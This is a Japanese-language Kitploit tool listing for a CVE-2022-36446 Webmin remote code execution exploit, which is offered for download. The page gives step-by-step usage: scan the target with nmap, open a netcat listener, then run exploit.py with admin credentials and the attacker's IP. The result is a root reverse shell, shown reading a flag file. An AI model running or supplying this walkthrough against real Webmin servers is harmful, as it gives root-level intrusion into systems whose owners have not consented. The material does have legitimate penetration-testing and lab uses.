Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-36446-Webmin-RCE — Webmin < 1.997のソフトウェアパッケージ更新モジュールを介した認証済みリモートコード実行エクスプロイト。サニタイズされていないパラメータを介してrootとして任意のコマンドを注入し、リバースシェルを配信します。 | Kitploit
ツール/GitHubGitHub/darnabin/cve-2022-36446-webmin-rce
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubdarnabin/cve-2022-36446-webmin-rce

CVE-2022-36446-Webmin-RCE

Webmin < 1.997のソフトウェアパッケージ更新モジュールを介した認証済みリモートコード実行エクスプロイト。サニタイズされていないパラメータを介してrootとして任意のコマンドを注入し、リバースシェルを配信します。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
22ヶ月前未レビュー

CVE-2022-36446 — Webmin < 1.997 RCE (認証済み)

Webmin バージョン 1.997 未満における Remote Code Execution の脆弱性のための Exploit。Software Package Updates モジュールを介して。

動作の仕組み

Webmin の Software Package Updates モジュールは、パラメータ u をシステムに渡す前に適切にサニタイズしません。そのモジュールにアクセスできる認証済みユーザーは、root として実行される任意のコマンドを注入できます。


前提条件

Exploit を実行する前に依存関係をインストールしてください:

root@kitploit:~
pip3 install requests beautifulsoup4 lxml urllib3

パラメータ

パラメータ説明例
-tターゲットのURL(ポートなし)https://192.168.1.10
-uWebminのユーザーadmin
-pWebminのパスワードpassword123
-lあなたのIP(シェルを受け取る場所)192.168.1.5
-lpリスニングポート4444

ステップバイステップ

1 — Nmap でターゲットのIPを特定します:

root@kitploit:~
nmap -sV TARGET_IP
# Busca el puerto 10000 con Webmin

2 — あなたのマシンでリスナーを開きます:

root@kitploit:~
nc -lvnp 4444

3 — 別のターミナルでexploitを実行します:

root@kitploit:~
python3 exploit.py \
  -t https://TARGET_IP \
  -u admin \
  -p PASSWORD \
  -l TU_IP \
  -lp 4444

4 — Exploitが成功すると、次のように表示されます:

5 — リスナーで root としてシェルを受け取ります:

root@kitploit:~
# whoami
root
# cat /root/Desktop/FLAG.txt
FLAG{...}

完全な例

root@kitploit:~
# Terminal 1
nc -lvnp 4444

# Terminal 2
python3 exploit.py -t https://192.168.253.156 -u admin -p 'W3bm1n2024' -l 192.168.253.130 -lp 4444

参考

  • CVE: CVE-2022-36446
  • CVSS Score: 9.9 (Critical)
  • 脆弱なバージョン: Webmin < 1.997
  • オリジナルエクスプロイト: https://www.exploit-db.com/exploits/50998
  • 原作者: Emir Polat
ツールをダウンロード